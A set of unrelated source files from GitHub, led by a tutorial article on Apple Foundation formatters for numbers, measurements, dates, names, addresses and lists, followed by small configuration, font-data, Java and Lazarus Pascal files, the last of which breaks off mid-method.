{% error %}
The advice to defer to user locale defaults has a critical exception:
**money**
Consider the following code
that uses the default `NumberFormatter` settings for
American and Japanese locales
to format the same number:
```swift
let number = 1234.5678 // 🤔
let formatter = NumberFormatter()
formatter.numberStyle = .currency
let 🇺🇸 = Locale(identifier: "en_US")
formatter.locale = 🇺🇸
formatter.string(for: number) // $1,234.57
let 🇯🇵 = Locale(identifier: "ja_JP")
formatter.locale = 🇯🇵
formatter.string(for: number) // ¥ 1,235 😵
```
```objc
NSNumberFormatter *numberFormatter = [[NSNumberFormatter alloc] init];
[numberFormatter setNumberStyle:NSNumberFormatterCurrencyStyle];
for (NSString *identifier in @[@"en_US", @"ja_JP"]) {
numberFormatter.locale = [NSLocale localeWithLocaleIdentifier:identifier];
NSLog(@"%@: %@", identifier, [numberFormatter stringFromNumber:@(1234.5678)]);
}
// Prints "$1,234.57" and "¥ 1,235" 😵
```
At the time of writing,
the difference between \$1,234.57 and ¥ 1,235
is roughly equivalent to the price difference between
a new [MacBook Air](https://www.apple.com/shop/buy-mac/macbook-air)
and
a [Lightning - 3.5 mm Adapter](https://www.apple.com/jp/shop/product/MMX62J/A/lightning-35-mmヘッドフォンジャックアダプタ).
Make a mistake like that in your app,
and someone --- developer or user ---
is going to be pretty upset.
Working with money in code is a deep topic,
but the basic guidance is this:
Use `Decimal` values (rather than `Float` or `Double`)
and specify an explicit currency.
For more information,
check out the
[Flight School Guide to Swift Numbers](https://flight.school/books/numbers/)
and its companion Swift library,
[`Money`](https://github.com/flight-school/money).
{% enderror %}
### MeasurementFormatter
`MeasurementFormatter` was introduced in iOS 10 and macOS 10.12
as part of the full complement of APIs for performing
type-safe dimensional calculations:
- `Unit` subclasses represent units of measure,
such as count and ratio
- `Dimension` subclasses represent dimensional units of measure,
such as mass and length,
(which is the case for the overwhelming majority of
the concrete subclasses provided,
on account of them being dimensional in nature)
- A `Measurement` is a quantity of a particular `Unit`
- A `UnitConverter` converts quantities of one unit to
a different, compatible unit
<details>
{::nomarkdown}
<summary>For the curious, here's the complete list of units supported by <code>MeasurementFormatter</code>:</summary>
{:/}
<figure>
| Measure | Unit Subclass | Base Unit |
| ----------------------------- | --------------------------------- | ----------------------------------- |
| Acceleration | `UnitAcceleration` | meters per second squared (m/s²) |
| Planar angle and rotation | `UnitAngle` | degrees (°) |
| Area | `UnitArea` | square meters (m²) |
| Concentration of mass | `UnitConcentrationMass` | milligrams per deciliter (mg/dL) |
| Dispersion | `UnitDispersion` | parts per million (ppm) |
| Duration | `UnitDuration` | seconds (sec) |
| Electric charge | `UnitElectricCharge` | coulombs (C) |
| Electric current | `UnitElectricCurrent` | amperes (A) |
| Electric potential difference | `UnitElectricPotentialDifference` | volts (V) |
| Electric resistance | `UnitElectricResistance` | ohms (Ω) |
| Energy | `UnitEnergy` | joules (J) |
| Frequency | `UnitFrequency` | hertz (Hz) |
| Fuel consumption | `UnitFuelEfficiency` | liters per 100 kilometers (L/100km) |
| Illuminance | `UnitIlluminance` | lux (lx) |
| Information Storage | `UnitInformationStorage` | Byte<sup>\*</sup> (byte) |
| Length | `UnitLength` | meters (m) |
| Mass | `UnitMass` | kilograms (kg) |
| Power | `UnitPower` | watts (W) |
| Pressure | `UnitPressure` | newtons per square meter (N/m²) |
| Speed | `UnitSpeed` | meters per second (m/s) |
| Temperature | `UnitTemperature` | kelvin (K) |
| Volume | `UnitVolume` | liters (L) |
<figcaption>
<p>Follows [ISO/IEC 80000-13 standard](https://en.wikipedia.org/wiki/ISO/IEC_80000);
one byte is 8 bits, 1 kilobyte = 1000¹ bytes</p>
</figcaption>
</figure>
</details>
---
`MeasurementFormatter` and its associated APIs are a intuitive ---
just a delight to work with, honestly.
The only potential snag for newcomers to Swift
(or Objective-C old-timers, perhaps)
are the use of generics to constrain `Measurement` values
to a particular `Unit` type.
```swift
import Foundation
// "The swift (Apus apus) can power itself to a speed of 111.6km/h"
let speed = Measurement<UnitSpeed>(value: 111.6,
unit: .kilometersPerHour)
let formatter = MeasurementFormatter()
formatter.string(from: speed) // 69.345 mph
```
#### Configuring the Underlying Number Formatter
By delegating much of its formatting responsibility to
an underlying `NumberFormatter` property,
`MeasurementFormatter` maintains a high degree of configurability
while keeping a small API footprint.
Readers with an engineering background may have noticed that
the localized speed in the previous example
gained an extra significant figure along the way.
As discussed previously,
we can enable `usesSignificantDigits` and set `maximumSignificantDigits`
to prevent incidental changes in precision.
```swift
formatter.numberFormatter.usesSignificantDigits = true
formatter.numberFormatter.maximumSignificantDigits = 4
formatter.string(from: speed) // 69.35 mph
```
#### Changing Which Unit is Displayed
A `MeasurementFormatter`,
by default,
will use the preferred unit for the user's current locale (if one exists)
instead of the one provided by a `Measurement` value.
Readers with a non-American background certainly noticed that
the localized speed in the original example
converted to a bizarre, archaic unit of measure known as "miles per hour".
You can override this default unit localization behavior
by passing the `providedUnit` option.
```swift
formatter.unitOptions = [.providedUnit]
formatter.string(from: speed) // 111.6 km/h
formatter.string(from: speed.converted(to: .milesPerHour)) // 69.35 mph
```
---
## Formatting Dates, Times, and Durations
| Class | Example Output | Availability |
| --------------------------- | ----------------- | ---------------------------- |
| `DateFormatter` | "July 15, 2019" | iOS 2.0 <br/> macOS 10.0+ |
| `ISO8601DateFormatter` | "2019-07-15" | iOS 10.0+ <br/> macOS 10.12+ |
| `DateComponentsFormatter` | "10 minutes" | iOS 8.0 <br/> macOS 10.10+ |
| `DateIntervalFormatter` | "6/3/19 - 6/7/19" | iOS 8.0 <br/> macOS 10.10+ |
| `RelativeDateTimeFormatter` | "3 weeks ago" | iOS 13.0+ <br/> macOS 10.15 |
### DateFormatter
`DateFormatter` is the <abbr title=" Original Gangster">OG</abbr> class
for representing dates and times.
And it remains your best, first choice
for the majority of date formatting tasks.
For a while,
there was a concern that it would become overburdened with responsibilities
like its sibling `NumberFormatter`.
But fortunately,
recent SDK releases spawned new formatters for new functionality.
We'll talk about those in a little bit.
#### Date and Time Styles
The most important properties for a `DateFormatter` object are its
`dateStyle` and `timeStyle`.
As with `NumberFormatter` and its `numberStyle`,
these date and time styles provide preset configurations
for common formats.
<table>
<thead>
<tr>
<th>Style</th>
<th>Date</th>
<th>Time</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>none</code></td>
<td>“”</td>
<td>“”</td>
</tr>
<tr>
<td><code>short</code></td>
<td>“11/16/37”</td>
<td>“3:30 PM”</td>
</tr>
<tr>
<td><code>medium</code></td>
<td>“Nov 16, 1937”</td>
<td>“3:30:32 PM”</td>
</tr>
<tr>
<td><code>long</code></td>
<td>“November 16, 1937”</td>
<td>“3:30:32 PM”</td>
</tr>
<tr>
<td><code>full</code></td>
<td>“Tuesday, November 16, 1937 AD</td>
<td>“3:30:42 PM EST”</td>
</tr>
</tbody>
</table>
```swift
let date = Date()
let formatter = DateFormatter()
formatter.dateStyle = .long
formatter.timeStyle = .long
formatter.string(from: date)
// July 15, 2019 at 9:41:00 AM PST
formatter.dateStyle = .short
formatter.timeStyle = .short
formatter.string(from: date)
// "7/16/19, 9:41:00 AM"
```
```objc
NSDateFormatter *formatter = [[NSDateFormatter alloc] init];
[formatter setDateStyle:NSDateFormatterLongStyle];
[formatter setTimeStyle:NSDateFormatterLongStyle];
NSLog(@"%@", [formatter stringFromDate:[NSDate date]]);
// July 15, 2019 at 9:41:00 AM PST
[formatter setDateStyle:NSDateFormatterShortStyle];
[formatter setTimeStyle:NSDateFormatterShortStyle];
NSLog(@"%@", [formatter stringFromDate:[NSDate date]]);
// 7/16/19, 9:41:00 AM
```
`dateStyle` and `timeStyle` are set independently.
So,
to display just the time for a particular date,
for example,
you set `dateStyle` to `none`:
```swift
let formatter = DateFormatter()
formatter.dateStyle = .none
formatter.timeStyle = .medium
let string = formatter.string(from: Date())
// 9:41:00 AM
```
```objc
NSDateFormatter *formatter = [[NSDateFormatter alloc] init];
[formatter setDateStyle:NSDateFormatterNoStyle];
[formatter setTimeStyle:NSDateFormatterMediumStyle];
NSLog(@"%@", [formatter stringFromDate:[NSDate date]]);
// 9:41:00 AM
```
As you might expect, each aspect of the date format can alternatively be configured individually, a la carte. For any aspiring time wizards `NSDateFormatter` has a bevy of different knobs and switches to play with.
{% warning %}
`DateFormatter` also has a `dateFormat` property
that takes a familiar `STRFTIME(3)`-style format string.
We've already called this out for `NumberFormatter`,
but it's a point that bears repeating:
use presets wherever possible and
only use custom format strings if absolutely necessary.
{% endwarning %}
### ISO8601DateFormatter
When we wrote our first article about `NSFormatter` back in 2013,
we made a point to include discussion of
[Peter Hosey's ISO8601DateFormatter](https://github.com/boredzo/iso-8601-date-formatter)'s
as the essential open-source library
for parsing timestamps from external data sources.
Fortunately,
we no longer need to proffer a third-party solution,
because, as of iOS 10.0 and macOS 10.12,
`ISO8601DateFormatter` is now built-in to Foundation.
```swift
let formatter = ISO8601DateFormatter()
formatter.date(from: "2019-07-15T09:41:00-07:00")
// Jul 15, 2019 at 9:41 AM
```
{% info %}
`JSONDecoder` provides built-in support for decoding ISO8601-formatted timestamps
by way of the `.iso8601` date decoding strategy.
```swift
import Foundation
let json = #"""
[{
"body": "Hello, world!",
"timestamp": "2019-07-15T09:41:00-07:00"
}]
"""#.data(using: .utf8)!
struct Comment: Decodable {
let body: String
let timestamp: Date
}
let decoder = JSONDecoder()
decoder.dateDecodingStrategy = .iso8601
let comments = try decoder.decode([Comment].self, from: json)
comments.first?.timestamp
// Jul 15, 2019 at 9:41 AM
```
{% endinfo %}
### DateIntervalFormatter
`DateIntervalFormatter` is like `DateFormatter`,
but can handle two dates at once ---
specifically, a start and end date.
```swift
let formatter = DateIntervalFormatter()
formatter.dateStyle = .short
formatter.timeStyle = .none
let fromDate = Date()
let toDate = Calendar.current.date(byAdding: .day, value: 7, to: fromDate)!
formatter.string(from: fromDate, to: toDate)
// "7/15/19 – 7/22/19"
```
```objc
NSDateIntervalFormatter *formatter = [[NSDateIntervalFormatter alloc] init];
formatter.dateStyle = NSDateIntervalFormatterShortStyle;
formatter.timeStyle = NSDateIntervalFormatterNoStyle;
NSDate *fromDate = [NSDate date];
NSDate *toDate = [fromDate dateByAddingTimeInterval:86400 * 7];
NSLog(@"%@", [formatter stringFromDate:fromDate toDate:toDate]);
// "7/15/19 – 7/22/19"
```
#### Date Interval Styles
<table>
<thead>
<tr>
<th>Style</th>
<th>Date</th>
<th>Time</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>none</code></td>
<td>“”</td>
<td>“”</td>
</tr>
<tr>
<td><code>short</code></td>
<td>“6/30/14 - 7/11/14”</td>
<td>“5:51 AM - 7:37 PM”</td>
</tr>
<tr>
<td><code>medium</code></td>
<td>“Jun 30, 2014 - Jul 11, 2014”</td>
<td>“5:51:49 AM - 7:38:29 PM”</td>
</tr>
<tr>
<td><code>long</code></td>
<td>“June 30, 2014 - July 11, 2014”</td>
<td>“6:02:54 AM GMT-8 - 7:49:34 PM GMT-8”</td>
</tr>
<tr>
<td><code>full</code></td>
<td>“Monday, June 30, 2014 - Friday, July 11, 2014</td>
<td>“6:03:28 PM Pacific Standard Time - 7:50:08 PM Pacific Standard Time”</td>
</tr>
</tbody>
</table>
{% info %}
When displaying business hours,
such as "Mon – Fri: 8:00 AM – 10:00 PM",
use the `shortWeekdaySymbols` of the current `Calendar`
to get localized names for the days of the week.
```swift
import Foundation
var calendar = Calendar.current
calendar.locale = Locale(identifier: "en_US")
calendar.shortWeekdaySymbols
// ["Sun", "Mon", "Tue", "Wed", "Thu", "Fri", "Sat"]
calendar.locale = Locale(identifier: "ja_JP")
calendar.shortWeekdaySymbols
// ["日", "月", "火", "水", "木", "金", "土"]
```
{% endinfo %}
### DateComponentsFormatter
As the name implies,
`DateComponentsFormatter` works with `DateComponents` values
([previously](/datecomponents/)),
which contain a combination of discrete calendar quantities,
such as "1 day and 2 hours".
`DateComponentsFormatter` provides localized representations of date components
in several different, pre-set formats:
```swift
let formatter = DateComponentsFormatter()
formatter.unitsStyle = .full
let components = DateComponents(day: 1, hour: 2)
let string = formatter.string(from: components)
// 1 day, 2 hours
```
```objc
NSDateComponentsFormatter *formatter = [[NSDateComponentsFormatter alloc] init];
formatter.unitsStyle = NSDateComponentsFormatterUnitsStyleFull;
NSDateComponents *components = [[NSDateComponents alloc] init];
components.day = 1;
components.hour = 2;
NSLog(@"%@", [formatter stringFromDateComponents:components]);
// 1 day, 2 hours
```
#### Date Components Unit Styles
| Style | Example |
| ------------- | ----------------------- |
| `positional` | "1:10" |
| `abbreviated` | "1h 10m" |
| `short` | "1hr 10min" |
| `full` | "1 hour, 10 minutes" |
| `spellOut` | "One hour, ten minutes" |
#### Formatting Context
Some years ago,
formatters introduced the concept of <dfn>formatting context</dfn>,
to handle situations where
the capitalization and punctuation of a localized string may depend on whether
it appears at the beginning or middle of a sentence.
A `context` property is available for `DateComponentsFormatter`,
as well as `DateFormatter`, `NumberFormatter`, and others.
<figure>
| Formatting Context | Output |
| --------------------- | -------------------- |
| `standalone` | "About 2 hours" |
| `listItem` | "About 2 hours" |
| `beginningOfSentence` | "About 2 hours" |
| `middleOfSentence` | "about 2 hours" |
| `dynamic` | Depends<sup>\*</sup> |
<figcaption>
<p><sup>\*</sup>
A `Dynamic` context changes capitalization automatically
depending on where it appears in the text
for locales that may position strings differently
depending on the content.</p>
</figcaption>
</figure>
### RelativeDateTimeFormatter
`RelativeDateTimeFormatter` is a newcomer in iOS 13 ---
and at the time of writing, still undocumented,
so consider this an NSHipster exclusive scoop!
Longtime readers may recall that
`DateFormatter` actually gave this a try circa iOS 4
by way of the `doesRelativeDateFormatting` property.
But that hardly ever worked,
and most of us forgot about it, probably.
Fortunately,
`RelativeDateTimeFormatter` succeeds
where `doesRelativeDateFormatting` fell short,
and offers some great new functionality to make your app
more personable and accessible.
(As far as we can tell,)
`RelativeDatetimeFormatter` takes the most significant date component
and displays it in terms of past or future tense
("1 day ago" / "in 1 day").
```swift
let formatter = RelativeDateTimeFormatter()
formatter.localizedString(from: DateComponents(day: 1, hour: 1)) // "in 1 day"
formatter.localizedString(from: DateComponents(day: -1)) // "1 day ago"
formatter.localizedString(from: DateComponents(hour: 3)) // "in 3 hours"
formatter.localizedString(from: DateComponents(minute: 60)) // "in 60 minutes"
```
For the most part,
this seems to work really well.
However, its handling of `nil`, zero, and net-zero values
leaves something to be desired...
```swift
formatter.localizedString(from: DateComponents(hour: 0)) // "in 0 hours"
formatter.localizedString(from: DateComponents(day: 1, hour: -24)) // "in 1 day"
formatter.localizedString(from: DateComponents()) // ""
```
#### Styles
<figure>
| Style | Example |
| ------------- | ------------------------- |
| `abbreviated` | "1 mo. ago" <sup>\*</sup> |
| `short` | "1 mo. ago" |
| `full` | "1 month ago" |
| `spellOut` | "one month ago" |
<figcaption>
<p><sup>\*</sup>May produce output distinct from `short` for non-English locales.</p>
</figcaption>
</figure>
#### Using Named Relative Date Times
By default,
`RelativeDateTimeFormatter` adopts the formulaic convention
we've seen so far.
But you can set the `dateTimeStyle` property to `.named`
to prefer localized <dfn>deictic expressions</dfn> ---
"tomorrow", "yesterday", "next week" ---
whenever one exists.
```swift
import Foundation
let formatter = RelativeDateTimeFormatter()
formatter.localizedString(from: DateComponents(day: -1)) // "1 day ago"
formatter.dateTimeStyle = .named
formatter.localizedString(from: DateComponents(day: -1)) // "yesterday"
```
This just goes to show that
beyond calendrical and temporal relativity,
`RelativeDateTimeFormatter` is a real whiz at linguistic relativity, too!
For example,
English doesn't have a word to describe the day before yesterday,
whereas other languages, like German, do.
```swift
formatter.localizedString(from: DateComponents(day: -2)) // "2 days ago"
formatter.locale = Locale(identifier: "de_DE")
formatter.localizedString(from: DateComponents(day: -2)) // "vorgestern"
```
<em lang="de">Hervorragend!</em>
---
## Formatting People and Places
| Class | Example Output | Availability |
| ------------------------------- | ------------------------------------------- | --------------------------- |
| `PersonNameComponentsFormatter` | "J. Appleseed" | iOS 9.0+ <br/> macOS 10.11+ |
| `CNContactFormatter` | "Appleseed, Johnny" | iOS 9.0+ <br/> macOS 10.11+ |
| `CNPostalAddressFormatter` | "1 Infinite Loop\\n<br/>Cupertino CA 95014" | iOS 9.0+ <br/> macOS 10.11+ |
{% warning %}
`CNContactFormatter`
is superseded by `PersonNameComponentsFormatter`.
Unless you're working with existing `CNContact` objects,
prefer the use of `PersonNameComponentsFormatter` to format personal names.
{% endwarning %}
### PersonNameComponentsFormatter
`PersonNameComponentsFormatter` is a sort of high water mark for Foundation.
It encapsulates one of the [hardest](https://martinfowler.com/bliki/TwoHardThings.html),
most personal problems in computer
in such a way to make it accessible to anyone
without requiring a degree in Ethnography.
The [documentation](https://developer.apple.com/documentation/foundation/personnamecomponentsformatter)
does a wonderful job illustrating the complexities of personal names
(if I might say so myself),
but if you had any doubt of the utility of such an API,
consider the following example:
```swift
let formatter = PersonNameComponentsFormatter()
var nameComponents = PersonNameComponents()
nameComponents.givenName = "Johnny"
nameComponents.familyName = "Appleseed"
formatter.string(from: nameComponents) // "Johnny Appleseed"
```
Simple enough, right?
We all know names are space delimited, first-last... _right?_
```swift
nameComponents.givenName = "约翰尼"
nameComponents.familyName = "苹果籽"
formatter.string(from: nameComponents) // "苹果籽约翰尼"
```
_’nuf said._
### CNPostalAddressFormatter
`CNPostalAddressFormatter` provides a convenient `Formatter`-based API
to functionality dating back to the original AddressBook framework.
The following example formats a constructed `CNMutablePostalAddress`,
but you'll most likely use existing `CNPostalAddress` values
retrieved from the user's address book.
```swift
let address = CNMutablePostalAddress()
address.street = "One Apple Park Way"
address.city = "Cupertino"
address.state = "CA"
address.postalCode = "95014"
let addressFormatter = CNPostalAddressFormatter()
addressFormatter.string(from: address)
/* "One Apple Park Way
Cupertino CA 95014" */
```
#### Styling Formatted Attributed Strings
When formatting compound values,
it can be hard to figure out where each component went
in the final, resulting string.
This can be a problem when you want to, for example,
call out certain parts in the UI.
Rather than hacking together an ad-hoc,
[regex](/swift-regular-expressions/)-based solution,
`CNPostalAddressFormatter` provides a method that vends an
`NSAttributedString` that lets you identify
the ranges of each component
(`PersonNameComponentsFormatter` does this too).
The `NSAttributedString` API is...
to put it politely,
bad.
It feels bad to use.
So for the sake of anyone hoping to take advantage of this functionality,
please copy-paste and appropriate the following code sample
to your heart's content:
```swift
var attributedString = addressFormatter.attributedString(
from: address,
withDefaultAttributes: [:]
).mutableCopy() as! NSMutableAttributedString
let stringRange = NSRange(location: 0, length: attributedString.length)
attributedString.enumerateAttributes(in: stringRange, options: []) { (attributes, attributesRange, _) in
let color: UIColor
switch attributes[NSAttributedString.Key(CNPostalAddressPropertyAttribute)] as? String {
case CNPostalAddressStreetKey:
color = .red
case CNPostalAddressCityKey:
color = .orange
case CNPostalAddressStateKey:
color = .green
case CNPostalAddressPostalCodeKey:
color = .purple
default:
return
}
attributedString.addAttribute(.foregroundColor,
value: color,
range: attributesRange)
}
```
<figure>
<address style="display: inline-block; padding: 1em; font-style: normal;">
<span style="color: red;">One Apple Park Way</span><br/>
<span style="color: orange;">Cupertino</span>
<span style="color: green;">CA</span>
<span style="color: purple;">95014</span>
</address>
</figure>
---
## Formatting Lists and Items
| Class | Example Output | Availability |
| --------------- | --------------------------------------- | ---------------------------- |
| `ListFormatter` | "macOS, iOS, iPadOS, watchOS, and tvOS" | iOS 13.0+ <br/> macOS 10.15+ |
### ListFormatter
Rounding out our survey of formatters in the Apple SDK,
it's another new addition in iOS 13:
`ListFormatter`.
To be completely honest,
we didn't know where to put this in the article,
so we just kind of stuck it on the end here.
(Though in hindsight,
this is perhaps appropriate given the subject matter).
Once again,
[we don't have any official documentation to work from at the moment](https://developer.apple.com/documentation/foundation/listformatter),
but the comments in the header file give us enough to go on.
> NSListFormatter provides locale-correct formatting of a list of items
> using the appropriate separator and conjunction.
> Note that the list formatter is unaware of
> the context where the joined string will be used,
> e.g., in the beginning of the sentence
> or used as a standalone string in the UI,
> so it will not provide any sort of capitalization customization on the given items,
> but merely join them as-is.
>
> The string joined this way may not be grammatically correct when placed in a sentence,
> and it should only be used in a standalone manner.
_tl;dr_:
This is `joined(by:)` with locale-aware serial and penultimate delimiters.
For simple lists of strings,
you don't even need to bother with instantiating `ListFormatter` ---
just call the `localizedString(byJoining:)` class method.
```swift
import Foundation
let operatingSystems = ["macOS", "iOS", "iPadOS", "watchOS", "tvOS"]
ListFormatter.localizedString(byJoining: operatingSystems)
// "macOS, iOS, iPadOS, watchOS, and tvOS"
```
`ListFormatter` works as you'd expect
for lists comprising zero, one, or two items.
```swift
ListFormatter.localizedString(byJoining: [])
// ""
ListFormatter.localizedString(byJoining: ["Apple"])
// "Apple"
ListFormatter.localizedString(byJoining: ["Jobs", "Woz"])
// "Jobs and Woz"
```
#### Lists of Formatted Values
`ListFormatter` exposes an underlying `itemFormatter` property,
which effectively adds a `map(_:)` before calling `joined(by:)`.
You use `itemFormatter` whenever you'd formatting a list of non-String elements.
For example,
you can set a `NumberFormatter` as the `itemFormatter` for a `ListFormatter`
to turn an array of cardinals (`Int` values)
into a localized list of ordinals.
```swift
let numberFormatter = NumberFormatter()
numberFormatter.numberStyle = .ordinal
let listFormatter = ListFormatter()
listFormatter.itemFormatter = numberFormatter
listFormatter.string(from: [1, 2, 3])
// "1st, 2nd, and 3rd"
```
{% warning %}
If you set a custom locale on your list formatter,
be sure to set that locale for the underlying formatter.
And be mindful of value semantics, too ---
without the re-assignment to `itemFormatter` in the example below,
you'd get a French list of English ordinals instead.
```swift
let 🇫🇷 = Locale(identifier: "fr_FR")
listFormatter.locale = 🇫🇷
numberFormatter.locale = 🇫🇷
listFormatter.itemFormatter = numberFormatter
listFormatter.string(from: [1, 2, 3])
// "1er, 2e et 3e"
```
{% endwarning %}
---
As some of the oldest members of the Foundation framework,
`NSNumberFormatter` and `NSDateFormatter`
are astonishingly well-suited to their respective domains,
in that way only decade-old software can.
This tradition of excellence is carried by the most recent incarnations as well.
If your app deals in numbers or dates
(or time intervals or names or lists measurements of any kind),
then `NSFormatter` is indispensable.
And if your app _doesn't_...
then the question is,
what _does_ it do, exactly?
Invest in learning all of the secrets of Foundation formatters
to get everything exactly how you want them.
And if you find yourself with formatting logic scattered across your app,
consider creating your own `Formatter` subclass
to consolidate all of that business logic in one place.
{% asset articles/formatter.css %}
| {
"pile_set_name": "Github"
} |
gcr.io/google_containers/kube-cross:v1.11.4-1
| {
"pile_set_name": "Github"
} |
/*
* /MathJax/jax/output/HTML-CSS/fonts/TeX/Typewriter/Regular/CombDiacritMarks.js
*
* Copyright (c) 2009-2014 The MathJax Consortium
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
MathJax.Hub.Insert(MathJax.OutputJax["HTML-CSS"].FONTDATA.FONTS.MathJax_Typewriter,{768:[611,-485,0,-409,-195],769:[611,-485,0,-331,-117],770:[611,-460,0,-429,-97],771:[611,-466,0,-438,-88],772:[577,-500,0,-452,-74],774:[611,-504,0,-446,-79],776:[612,-519,0,-421,-104],778:[619,-499,0,-344,-182],780:[577,-449,0,-427,-99]});MathJax.Ajax.loadComplete(MathJax.OutputJax["HTML-CSS"].fontDir+"/Typewriter/Regular/CombDiacritMarks.js");
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:context="http://www.springframework.org/schema/context"
xsi:schemaLocation="http://www.springframework.org/schema/beans
http://www.springframework.org/schema/beans/spring-beans.xsd
http://www.springframework.org/schema/context
http://www.springframework.org/schema/context/spring-context.xsd">
<context:annotation-config /> <!-- allows us to use spring annotations in beans -->
<!-- Authority control -->
<bean class="org.dspace.authority.AuthoritySolrServiceImpl" id="org.dspace.authority.AuthoritySearchService"/>
<alias name="org.dspace.authority.AuthoritySearchService" alias="org.dspace.authority.indexer.AuthorityIndexingService"/>
<bean id="dspace.DSpaceAuthorityIndexer" class="org.dspace.authority.indexer.DSpaceAuthorityIndexer"/>
<bean name="AuthorityTypes" class="org.dspace.authority.AuthorityTypes">
<property name="types">
<list>
<bean class="org.dspace.authority.PersonAuthorityValue"/>
</list>
</property>
<property name="fieldDefaults">
<map>
<entry key="dc_contributor_author">
<bean class="org.dspace.authority.PersonAuthorityValue"/>
</entry>
</map>
</property>
</bean>
</beans>
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<packages>
<package id="jQuery" version="1.6.4" targetFramework="net451" />
<package id="Microsoft.AspNet.SignalR" version="2.2.0" targetFramework="net451" />
<package id="Microsoft.AspNet.SignalR.Core" version="2.2.0" targetFramework="net451" />
<package id="Microsoft.AspNet.SignalR.JS" version="2.2.0" targetFramework="net451" />
<package id="Microsoft.AspNet.SignalR.SystemWeb" version="2.2.0" targetFramework="net451" />
<package id="Microsoft.Owin" version="2.1.0" targetFramework="net451" />
<package id="Microsoft.Owin.Host.SystemWeb" version="2.1.0" targetFramework="net451" />
<package id="Microsoft.Owin.Security" version="2.1.0" targetFramework="net451" />
<package id="Newtonsoft.Json" version="7.0.1" targetFramework="net451" />
<package id="Owin" version="1.0" targetFramework="net451" />
<package id="Serilog" version="1.5.7" targetFramework="net451" />
</packages> | {
"pile_set_name": "Github"
} |
{
"multipart": [
{
"when": {
"stage": "0"
},
"apply": [
{
"model": "tfc:plants/poppy_0"
}
]
},
{
"when": {
"stage": "1"
},
"apply": [
{
"model": "tfc:plants/poppy_1"
}
]
},
{
"when": {
"stage": "2"
},
"apply": [
{
"model": "tfc:plants/poppy_2"
}
]
},
{
"when": {
"stage": "3"
},
"apply": [
{
"model": "tfc:plants/poppy_3"
}
]
},
{
"when": {
"stage": "4"
},
"apply": [
{
"model": "tfc:plants/poppy_4"
}
]
}
]
}
| {
"pile_set_name": "Github"
} |
/**
* Copyright 2011-2019 Asakusa Framework Team.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.asakusafw.runtime.io.text;
import com.asakusafw.runtime.io.ModelOutput;
/**
/**
* Output to text files.
* @param <T> the data type
* @since 0.9.1
*/
public interface TextOutput<T> extends ModelOutput<T> {
// no special members
}
| {
"pile_set_name": "Github"
} |
{(*}
(*------------------------------------------------------------------------------
Delphi Code formatter source code
The Original Code is frClarifyCaseBlocks.pas, released June 2004.
The Initial Developer of the Original Code is Anthony Steele.
Portions created by Anthony Steele are Copyright (C) 1999-2008 Anthony Steele.
All Rights Reserved.
Contributor(s): Anthony Steele.
The contents of this file are subject to the Mozilla Public License Version 1.1
(the "License"). you may not use this file except in compliance with the License.
You may obtain a copy of the License at http://www.mozilla.org/NPL/
Software distributed under the License is distributed on an "AS IS" basis,
WITHOUT WARRANTY OF ANY KIND, either express or implied.
See the License for the specific language governing rights and limitations
under the License.
Alternatively, the contents of this file may be used under the terms of
the GNU General Public License Version 2 or later (the "GPL")
See http://www.gnu.org/licenses/gpl.html
------------------------------------------------------------------------------*)
{*)}
unit frClarifyCaseBlocks;
{$I JcfGlobal.inc}
interface
uses
Classes, StdCtrls, ExtCtrls,
IDEOptionsIntf, IDEOptEditorIntf;
type
{ TfClarifyCaseBlocks }
TfClarifyCaseBlocks = class(TAbstractIDEOptionsEditor)
rgLabelBegin: TRadioGroup;
rgLabel: TRadioGroup;
Label1: TLabel;
rgCaseLabel: TRadioGroup;
rgElseCase: TRadioGroup;
rgCaseBegin: TRadioGroup;
rgCaseElseBegin: TRadioGroup;
procedure FrameResize(Sender:TObject);
public
constructor Create(AOwner: TComponent); override;
function GetTitle: String; override;
procedure Setup({%H-}ADialog: TAbstractOptionsEditorDialog); override;
procedure ReadSettings({%H-}AOptions: TAbstractIDEOptions); override;
procedure WriteSettings({%H-}AOptions: TAbstractIDEOptions); override;
class function SupportedOptionsClass: TAbstractIDEOptionsClass; override;
end;
implementation
{$R *.lfm}
uses
JcfSettings, SettingsTypes, JcfUIConsts;
procedure TfClarifyCaseBlocks.FrameResize(Sender:TObject);
begin
rgLabel.Width := (Width-18) div 2;
end;
constructor TfClarifyCaseBlocks.Create(AOwner: TComponent);
begin
inherited;
//fiHelpContext := HELP_CLARIFY_BLOCKS;
end;
function TfClarifyCaseBlocks.GetTitle: String;
begin
Result := lisCaseBlocksCaseBlocks;
end;
procedure TfClarifyCaseBlocks.Setup(ADialog: TAbstractOptionsEditorDialog);
begin
Label1.Caption := lisCaseBlocksUseANewLineInCaseBlocksAt;
rgLabelBegin.Caption := lisCaseBlocksLabelWithBegin;
rgLabelBegin.Items[0] := lisCaseBlocksAlways;
rgLabelBegin.Items[1] := lisCaseBlocksLeaveAsIs;
rgLabelBegin.Items[2] := lisCaseBlocksNever;
rgLabel.Caption := lisCaseBlocksLabelWithoutBegin;
rgLabel.Items[0] := lisCaseBlocksAlways;
rgLabel.Items[1] := lisCaseBlocksLeaveAsIs;
rgLabel.Items[2] := lisCaseBlocksNever;
rgCaseBegin.Caption := lisCaseBlocksCaseWithBegin;
rgCaseBegin.Items[0] := lisCaseBlocksAlways;
rgCaseBegin.Items[1] := lisCaseBlocksLeaveAsIs;
rgCaseBegin.Items[2] := lisCaseBlocksNever;
